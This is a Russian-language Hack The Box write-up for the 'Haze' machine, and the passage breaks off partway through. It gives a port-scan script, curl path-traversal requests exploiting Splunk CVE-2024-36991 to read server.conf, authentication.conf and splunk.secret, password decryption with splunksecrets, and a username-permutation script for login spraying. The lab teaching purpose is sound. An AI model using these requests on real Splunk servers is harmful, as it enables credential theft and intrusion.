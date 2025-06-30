Се­год­ня мы про­экс­плу­ати­руем уяз­вимость в монито­рин­говой сис­теме Splunk, что­бы получить учет­ные дан­ные. Затем для ком­про­мета­ции нес­коль­ких учет­ных записей про­экс­плу­ати­руем раз­решения, а для повыше­ния при­виле­гий ском­про­мети­руем админ­скую учет­ку Splunk и добавим свой модуль для уста­нов­ления при­виле­гиро­ван­ной сес­сии.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Haze с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 61 haze. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr ' ' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел 14 откры­тых пор­тов:

88 — Kerberos;

135 — Microsoft RPC;

139 — NetBIOS, NetLogon;

389 — LDAP;

445 — SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

5985 — служ­ба уда­лен­ного управле­ния WinRM;

пор­ты 8000, 8088, 8089 — сис­тема Splunk.

Нач­нем, конеч­но же, с прос­мотра Splunk.

Точка входа

На вто­ром сай­те нам откры­вает­ся вер­сия Splunk — 9.2.1. Сра­зу сто­ит про­верить, есть ли для нее готовые экс­пло­иты. Пер­вым делом прос­то ищем в Google.

И находим пост в бло­ге SonicWall, где под­робно раз­бира­ется уяз­вимость CVE-2024-36991. Она поз­воля­ет обхо­дить пути с эндпо­инта / modules/ messaging/ и читать про­изволь­ные фай­лы. По номеру CVE находим и рабочий PoC на GitHub. Он поз­воля­ет получать учет­ные дан­ные из базы дан­ных.

python3 CVE- 2024- 36991. py -u http:/ / 10. 10. 11. 61: 8000

Точка опоры

У нас есть воз­можность читать фай­лы, поэто­му при­кинем, что может быть инте­рес­ного. Я не стал замора­чивать­ся и спро­сил у ChatGPT, какие кон­фиги Splunk могут ока­зать­ся полез­ны, а так­же что в них содер­жится.

В фай­ле server. conf находим зашиф­рован­ные тех­ничес­кие пароли, а в authentication. conf есть домен­ные учет­ные дан­ные поль­зовате­ля Paul Taylor для свя­зи с LDAP.

curl -s 'http:/ haze. htb: 8000/ en-US/ modules/ messaging/ C:../ C:../ C:../ C:../ C:../ C:../ C:../ C:../ Program%20Files/ Splunk/ etc/ system/ local/ server. conf'

curl -s 'http:/ haze. htb: 8000/ en-US/ modules/ messaging/ C:../ C:../ C:../ C:../ C:../ C:../ C:../ C:../ Program%20Files/ Splunk/ etc/ system/ local/ authentication. conf'

Что­бы рас­шифро­вать пароли, нам нужен ключ из фай­ла auth/ splunk. secret .

curl -s 'http:/ haze. htb: 8000/ en-US/ modules/ messaging/ C:../ C:../ C:../ C:../ C:../ C:../ C:../ C:../ Program%20Files/ Splunk/ etc/ auth/ splunk. secret'

Ког­да у нас есть ключ, мы можем исполь­зовать скрипт splunksecrets для рас­шифро­выва­ния паролей. При запус­ке ука­зыва­ем файл splunk. secret , пос­ле чего вво­дим зашиф­рован­ные дан­ные и получа­ем пароль в откры­том виде.

pip install splunksecrets splunksecrets splunk- decrypt -S splunk. secret

У нас есть пароль, но нет логина. По име­ни поль­зовате­ля мож­но сос­тавить спи­сок всех воз­можных вари­антов учет­ной записи. Для это­го исполь­зуем сле­дующий скрипт.

names = [ " Paul Taylor " ] list = [ ] for name in names : n1 , n2 = name . split ( ' ' ) list . append ( n1 ) list . append ( n1 + n2 ) list . append ( n1 + " . " + n2 ) list . append ( n1 + " - " + n2 ) list . append ( n1 + " _ " + n2 ) list . append ( n1 + n2 [ 0 ] ) list . append ( n1 + " . " + n2 [ 0 ] ) list . append ( n1 + " - " + n2 [ 0 ] ) list . append ( n1 + " _ " + n2 [ 0 ] ) list . append ( n2 [ 0 ] + n1 ) list . append ( n2 [ 0 ] + " . " + n1 ) list . append ( n2 [ 0 ] + " - " + n1 ) list . append ( n2 [ 0 ] + " _ " + n1 ) list . append ( n2 ) list . append ( n2 + n1 ) list . append ( n2 + " . " + n1 ) list . append ( n2 + " - " + n1 ) list . append ( n2 + " _ " + n1 ) list . append ( n2 + n1 [ 0 ] ) list . append ( n2 + " . " + n1 [ 0 ] ) list . append ( n2 + " - " + n1 [ 0 ] ) list . append ( n2 + " _ " + n1 [ 0 ] ) list . append ( n1 [ 0 ] + n2 ) list . append ( n1 [ 0 ] + " . " + n2 ) list . append ( n1 [ 0 ] + " - " + n2 ) list . append ( n1 [ 0 ] + " _ " + n2 ) for n in list : print ( n )

За­тем переби­раем логины с помощью NetExec и получа­ем учет­ную запись в нуж­ном фор­мате.